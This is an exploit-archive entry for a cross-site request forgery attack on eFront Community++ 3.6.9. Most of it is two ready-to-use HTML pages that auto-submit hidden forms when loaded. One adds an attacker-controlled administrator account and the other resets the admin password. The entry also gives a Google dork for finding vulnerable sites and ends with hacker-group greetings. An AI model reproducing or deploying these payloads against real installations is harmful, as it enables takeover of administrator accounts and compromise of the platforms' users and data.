eFront Community++ <= XSRF (Add admin/change admin passwd)

2011-05-28T00:00:00
ID 1337DAY-ID-16224
Type zdt
Reporter Caddy-Dz
Modified 2011-05-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 

 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/ 
 
			Exploit-ID is the Indonesian Exploit Archive
 
Web             : exploit-id.com	

e-mail          : root[at]exploit-id.com               

                      #########################################
                       I'm Caddy-Dz ,  member from exploit-id.com

                      #########################################			  
================================================================================
####
# Exploit Title: eFront Community++ <=XSRF (Add admin/change admin passwd)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected]  |  [email protected]
# Category:: webapps
# Google Dork: intext:"Community++ Edition" inurl:/www/index.php
# Vendor: http://www.efrontlearning.net/
# Version: 3.6.9
# Tested on: [Windows Vista Edition Intégrale]
####

[*] #01# Add Admin: ~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~


<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
   
	</script>
	
<form  action="http://127.0.0.1/communityplusplus/www/administrator.php?ctg=personal&user=admin&op=profile&add_user=1" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);"> 
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" /> 
  <table class = "formElements"> 
  <input type="hidden" name="login" / value="caddy-dz">
  <input type="hidden" name="password_" / value="caddy-dz">
  <input type="hidden" name="passrepeat" / value="caddy-dz">
  <input type="hidden" name="name" / value="islem">
  <input type="hidden" name="surname" / value="cadi">
  <input type="hidden" name="email" / value="[email protected]">
  <input type="hidden" name="active" value="0" /><input class="inputCheckbox" id="activeCheckbox" name="active" type="checkbox" value="1" checked="checked" /></td></tr> 
  <td class = "elementCell"><select name="user_type"> 
	<option value="student">Student</option> 
	<option value="professor">Professor</option> 
	<option value="administrator" selected="selected">Administrator</option> 
 </form> 
 
 
 
[*] #02# Change Admin Password:~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



<html>
<head>
<title>Algerians Hackers</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}
   
	</script>
<form  action="http://127.0.0.1/communityplusplus/www/administrator.php?ctg=personal&user=admin&op=profile" method="post" name="user_form" id="user_form" enctype="multipart/form-data" onsubmit="try { var myValidator = validate_user_form; } catch(e) { return true; } return myValidator(this);"> 
  <input name="_qf__user_form" type="hidden" value="" /><input name="MAX_FILE_SIZE" type="hidden" value="8388608" /> 
  <table class = "formElements"> 
  <input type="hidden" name="login" value="admin" />
  <input type="hidden" name="password_" type="password" / value="caddy-dz">
  <input type="hidden" name="passrepeat" type="password" / value="caddy-dz">
  <input type="hidden" name="name" type="text" value="islem" />
  <input type="hidden" name="surname" type="text" value="cadi" />
  <input type="hidden" name="email" type="text" value="[email protected]" />
  <input type="hidden" name="user_type" value="administrator" />
  
 </form> 
 
 
####
Peace From Algeria
####

=================================**Algerians Hackers**=======================================
# Greets To : 
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  Kalashinkov3 ,
  (exploit-id.com) , (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , 
  CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================



#  0day.today [2018-02-19]  #